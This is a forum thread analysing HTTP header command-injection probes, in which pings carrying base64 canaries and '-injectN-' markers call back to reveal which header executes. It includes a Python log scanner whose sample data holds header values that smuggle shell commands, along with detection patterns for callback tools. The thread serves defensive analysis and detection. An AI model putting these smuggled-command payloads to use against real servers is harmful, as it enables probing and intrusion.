
http header remote code execution - help me learn

Hi everyone,


I hope someone cares to teach me what was tried in this HTTP header remote code execution, and that others can also learn from this analysis.

Here is an example of the log:


The blurred info in the following image contains the external IP of my gateway:



Here is the capture opened in Wireshark. Notice that all the blurred fields contain the same external IP address as above.


So this is what I understand. 

echo aaaaaaaaaaa | base64 results in encoding the text aaa... to base64, which gives the result YWFhYWFhYWFhYWEK

So all these tests will result in these:

ping YWFhYWFhYWFhYWEK-inject1-(my external IP)

ping YWFhYWFhYWFhYWEK-inject2-(my external IP)

ping YWFhYWFhYWFhYWEK-inject3-(my external IP)

ping YWFhYWFhYWFhYWEK-inject4-(my external IP)


Since they use inject1, inject2, inject3 and inject4, does it mean they are trying to see which HTTP header field it's possible to inject into? Meaning inject1 would mean it worked by using the Cookie field?

But maybe more important: did they manage to run the code "echo aaaaaaaaaa | base64" on the system as a test for further/later attacks? And also, by including the external IP address, do they get to know which servers on the Internet are vulnerable and ping back to the domain?


Maybe I'm totally wrong, but I hope someone cares to explain.




Yes, they are trying to see which field they can inject arbitrary code into, with the different hostnames and pings resulting in an activity they can track.
I imagine they could log both the DNS lookup (something unique, so it would definitely go back to their name servers and not be cached) and the actual ping to determine the level of success (a potential exfiltration channel), and of course the IP.
And yes, if this code executes at all, that is an issue.
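The probe pattern discussed above, turned into a log check as an added example (not code from the thread or from Check Point): it flags header values carrying shell metacharacters or the -injectN-host marker, reproduces the base64 canary from the echo ... | base64 pipeline the way the original post did, and records the callback host so the DNS and ICMP traffic PhoneBoy mentions can be hunted. The header lines and the 203.0.113.10 address are constructed placeholders.

```python
import base64
import re

# Constructed sample log lines (not from the thread): "Header: value" pairs as a
# reverse proxy or WAF might record them. 203.0.113.10 stands in for the poster's
# external IP; the canary is base64 of "aaaaaaaaaaa\n", exactly as in the thread.
SAMPLE_HEADERS = [
    "Cookie: $(ping $(echo aaaaaaaaaaa | base64)-inject1-203.0.113.10)",
    "User-Agent: `ping YWFhYWFhYWFhYWEK-inject2-203.0.113.10`",
    "X-Forwarded-For: 198.51.100.7; ping YWFhYWFhYWFhYWEK-inject3-203.0.113.10",
    "Referer: https://example.net/page?id=1",
    "Accept: text/html",
]

SHELL_META = re.compile(r"\$\(|`|\|\s*\w|;\s*\w|&&")          # command substitution / chaining
ECHO_B64 = re.compile(r"echo\s+(?P<text>\S+)\s*\|\s*base64")   # the canary-generating pipeline
MARKER = re.compile(r"(?P<canary>[A-Za-z0-9+/=]{4,}|\$\([^)]*\))-(?P<tag>inject\d+)-(?P<host>[\w.\-]+)")
CALLBACK = re.compile(r"\b(ping|nslookup|dig|curl|wget)\b")      # out-of-band confirmation tools


def analyze_header(line):
    """Return a finding for one 'Name: value' log line, or None if it looks benign."""
    name, _, value = line.partition(":")
    value = value.strip()
    marker = MARKER.search(value)
    if not SHELL_META.search(value) and not marker:
        return None
    finding = {"header": name.strip(), "tag": None, "callback_host": None,
               "canary": None, "tools": sorted(set(CALLBACK.findall(value)))}
    if marker:
        finding["tag"] = marker.group("tag")          # injectN = which header the probe targeted
        finding["callback_host"] = marker.group("host")
        echo = ECHO_B64.search(value)
        if echo:  # canary still in command form: reproduce what the shell would emit
            finding["canary"] = base64.b64encode((echo.group("text") + "\n").encode()).decode()
        else:     # canary already resolved by the target, or pasted literally
            finding["canary"] = marker.group("canary")
    return finding


def decode_canary(token):
    """Decode a base64 canary back to the text the probe echoed, or None if not base64."""
    try:
        return base64.b64decode(token, validate=True).decode("ascii").rstrip("\n")
    except (ValueError, UnicodeDecodeError):
        return None


def scan(lines):
    """Run analyze_header over every line and keep only the suspicious ones."""
    return [f for f in (analyze_header(ln) for ln in lines) if f]
```

A hit with a callback host is the cue to search DNS and ICMP logs for that host around the same timestamp; traffic there means the command actually ran, not just that it was received.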


Thanks @PhoneBoy for confirming this. That's pretty clever of them, I would say. I searched for the code online and found this website


Does it mean that the website was vulnerable to this specific attack? It's weird seeing it there as part of the website. In our case they used the GET method.

Edit1: I guess that it was only cached on the website, since the HTTP GET method can be cached on the server side. At least they tried on this website too.

